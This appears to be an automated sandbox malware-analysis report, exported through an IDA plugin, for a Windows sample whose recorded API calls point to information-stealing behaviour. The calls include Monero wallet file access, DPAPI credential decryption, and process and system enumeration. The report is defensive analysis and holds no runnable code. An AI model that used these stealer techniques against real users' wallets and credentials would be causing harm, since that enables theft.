Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 04bede1f5a7067daca4cbc2bda1aa65aaa7cb35a3295bd80fc6a5fb919ab7b2d
Instruction ID: 9444f10f5b2ec4779f6c12da41061e66818a59f354a1202c78db59d1921dd76b
Opcode Fuzzy Hash: 04bede1f5a7067daca4cbc2bda1aa65aaa7cb35a3295bd80fc6a5fb919ab7b2d
Instruction Fuzzy Hash: 0C412D71950218EBDF24DB54DC99BEEB3B8FF48740F208199E10966191DB782F85CFA2

Function 0076E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00780D73), ref: 0076E4A2
StrCmpCA.SHLWAPI(?,007814F8), ref: 0076E4F2
StrCmpCA.SHLWAPI(?,007814FC), ref: 0076E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0076EBDF

Strings

\*.*, xrefs: 0076E44D

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 929e4272d17877b38de990c773e6ddaf020c92d47e633eb74a7c07050b4de1ac
Instruction ID: 48c52ef99f73e765a1484e2c570197f518e3a77694714ddf6c579955ef89456e
Opcode Fuzzy Hash: 929e4272d17877b38de990c773e6ddaf020c92d47e633eb74a7c07050b4de1ac
Instruction Fuzzy Hash: EC122271910114EAEF15FB60DC9ADEE7378AF94340F4085A8B51E96091EF386F49CFA2

Function 00779600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0077961E
Process32First.KERNEL32(00780ACA,00000128), ref: 00779632
Process32Next.KERNEL32(00780ACA,00000128), ref: 00779647
StrCmpCA.SHLWAPI(?,00000000), ref: 0077965C
CloseHandle.KERNEL32(00780ACA), ref: 0077967A

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6d4c6a343d5d7c64709636b5e69bc157ab4acdd0742eca1da40492017fdc4623
Instruction ID: 4c16103dd59fb426a9b347bc88ccdeadb1667ecd0796a6f29fbcf4a7349478ca
Opcode Fuzzy Hash: 6d4c6a343d5d7c64709636b5e69bc157ab4acdd0742eca1da40492017fdc4623
Instruction Fuzzy Hash: 4A01E975A15208ABCF15DFA5C948BEEB7F8AF48340F108298AA0AD7250D7389A44DF91

Function 00777A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0125E110,00000000,?,00780E10,00000000,?,00000000,00000000), ref: 00777A63
RtlAllocateHeap.NTDLL(00000000), ref: 00777A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0125E110,00000000,?,00780E10,00000000,?,00000000,00000000,?), ref: 00777A7D
wsprintfA.USER32 ref: 00777AB7

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: e71aeb78b6f1f86ed0411c69c9e43b6eff062dd5915208cc0883112d15192a41
Instruction ID: e2b78fc1b88bf7cabe02de9be57c52b5e2b5d83316106fb9a1a95aeff1166fa9
Opcode Fuzzy Hash: e71aeb78b6f1f86ed0411c69c9e43b6eff062dd5915208cc0883112d15192a41
Instruction Fuzzy Hash: C01182B1949218DBEB248F58DC49F69B778FB05711F1087D9E90A932C0C7785E40CF91

Function 00769B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00769B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00769BA3
LocalFree.KERNEL32(?), ref: 00769BD3

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: b7386aefc1d762dcfc30537cdf15f61a51ad016d28ced71edbd9a0fea297adb1
Instruction ID: cd01eeb49bbfc2ba0a8c4e8add610d97aaac8a84acec02b29da3efd2679c2329
Opcode Fuzzy Hash: b7386aefc1d762dcfc30537cdf15f61a51ad016d28ced71edbd9a0fea297adb1
Instruction Fuzzy Hash: BD11C9B8A00209EFDB04DF98D985AAE77B9FF89300F104598ED15A7390D774AE10CFA1

Function 00777850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007611B7), ref: 00777880
RtlAllocateHeap.NTDLL(00000000), ref: 00777887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0077789F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 008239aacc578b709b7dd5bc0ee8e55efb819776dbf78c698854489bffc417dc
Instruction ID: 6196401382306b444cc6db51fa1d3872ed559df72e5913c8e0ada025c08a3ba0
Opcode Fuzzy Hash: 008239aacc578b709b7dd5bc0ee8e55efb819776dbf78c698854489bffc417dc
Instruction Fuzzy Hash: F0F044F1D44209ABCB14DF98DD49FAEBBB8EB05711F100159F605A2680C7781904CBE1

Function 00761160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0076116A
ExitProcess.KERNEL32 ref: 0076117E

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 5377b0284862d993d2f9420898b45faa99b5d54be22b63d183d76fdbda8025c8
Instruction ID: 157802084f75d55934bf6f8c90f4f4476691c750f9039465573bd9b64ca2f041
Opcode Fuzzy Hash: 5377b0284862d993d2f9420898b45faa99b5d54be22b63d183d76fdbda8025c8
Instruction Fuzzy Hash: 7DD05E74D0430CDBCB04DFE0D8496EEBBB8FB09311F000554DD0562340EB305881CAA6

Function 00779C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,01245080), ref: 00779C2D
GetProcAddress.KERNEL32(75550000,012450C0), ref: 00779C45
GetProcAddress.KERNEL32(75550000,012595A0), ref: 00779C5E
GetProcAddress.KERNEL32(75550000,01259618), ref: 00779C76
GetProcAddress.KERNEL32(75550000,0125D100), ref: 00779C8E
GetProcAddress.KERNEL32(75550000,0125D088), ref: 00779CA7
GetProcAddress.KERNEL32(75550000,0124B7C0), ref: 00779CBF
GetProcAddress.KERNEL32(75550000,0125CF38), ref: 00779CD7
GetProcAddress.KERNEL32(75550000,0125D028), ref: 00779CF0
GetProcAddress.KERNEL32(75550000,0125CFC8), ref: 00779D08
GetProcAddress.KERNEL32(75550000,0125CF80), ref: 00779D20
GetProcAddress.KERNEL32(75550000,01245020), ref: 00779D39
GetProcAddress.KERNEL32(75550000,01245040), ref: 00779D51
GetProcAddress.KERNEL32(75550000,012450E0), ref: 00779D69
GetProcAddress.KERNEL32(75550000,01244DC0), ref: 00779D82
GetProcAddress.KERNEL32(75550000,0125CF98), ref: 00779D9A
GetProcAddress.KERNEL32(75550000,0125CFB0), ref: 00779DB2
GetProcAddress.KERNEL32(75550000,0124B838), ref: 00779DCB
GetProcAddress.KERNEL32(75550000,01245120), ref: 00779DE3
GetProcAddress.KERNEL32(75550000,0125CFE0), ref: 00779DFB
GetProcAddress.KERNEL32(75550000,0125D040), ref: 00779E14
GetProcAddress.KERNEL32(75550000,0125CE48), ref: 00779E2C
GetProcAddress.KERNEL32(75550000,0125D130), ref: 00779E44
GetProcAddress.KERNEL32(75550000,01244F00), ref: 00779E5D
GetProcAddress.KERNEL32(75550000,0125CFF8), ref: 00779E75
GetProcAddress.KERNEL32(75550000,0125D010), ref: 00779E8D
GetProcAddress.KERNEL32(75550000,0125D0E8), ref: 00779EA6
GetProcAddress.KERNEL32(75550000,0125CEF0), ref: 00779EBE
GetProcAddress.KERNEL32(75550000,0125CEC0), ref: 00779ED6
GetProcAddress.KERNEL32(75550000,0125CED8), ref: 00779EEF
GetProcAddress.KERNEL32(75550000,0125D058), ref: 00779F07
GetProcAddress.KERNEL32(75550000,0125CF50), ref: 00779F1F
GetProcAddress.KERNEL32(75550000,0125D070), ref: 00779F38
GetProcAddress.KERNEL32(75550000,0125A9E0), ref: 00779F50
GetProcAddress.KERNEL32(75550000,0125D0A0), ref: 00779F68
GetProcAddress.KERNEL32(75550000,0125CEA8), ref: 00779F81
GetProcAddress.KERNEL32(75550000,01244F20), ref: 00779F99
GetProcAddress.KERNEL32(75550000,0125D118), ref: 00779FB1
GetProcAddress.KERNEL32(75550000,01244E40), ref: 00779FCA
GetProcAddress.KERNEL32(75550000,0125D0B8), ref: 00779FE2
GetProcAddress.KERNEL32(75550000,0125D0D0), ref: 00779FFA
GetProcAddress.KERNEL32(75550000,01244F40), ref: 0077A013
GetProcAddress.KERNEL32(75550000,01244F80), ref: 0077A02B
LoadLibraryA.KERNEL32(0125CE78,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A03D
LoadLibraryA.KERNEL32(0125CE60,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A04E
LoadLibraryA.KERNEL32(0125CE90,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A060
LoadLibraryA.KERNEL32(0125CF08,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A072
LoadLibraryA.KERNEL32(0125CF20,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A083
LoadLibraryA.KERNEL32(0125CF68,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A095
LoadLibraryA.KERNEL32(0125D2F8,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A0A7
LoadLibraryA.KERNEL32(0125D2B0,?,00775CA3,00780AEB,?,?,?,?,?,?,?,?,?,?,00780AEA,00780AE3), ref: 0077A0B8
GetProcAddress.KERNEL32(75750000,01245460), ref: 0077A0DA
GetProcAddress.KERNEL32(75750000,0125D2C8), ref: 0077A0F2
GetProcAddress.KERNEL32(75750000,01259158), ref: 0077A10A
GetProcAddress.KERNEL32(75750000,0125D370), ref: 0077A123
GetProcAddress.KERNEL32(75750000,012453E0), ref: 0077A13B
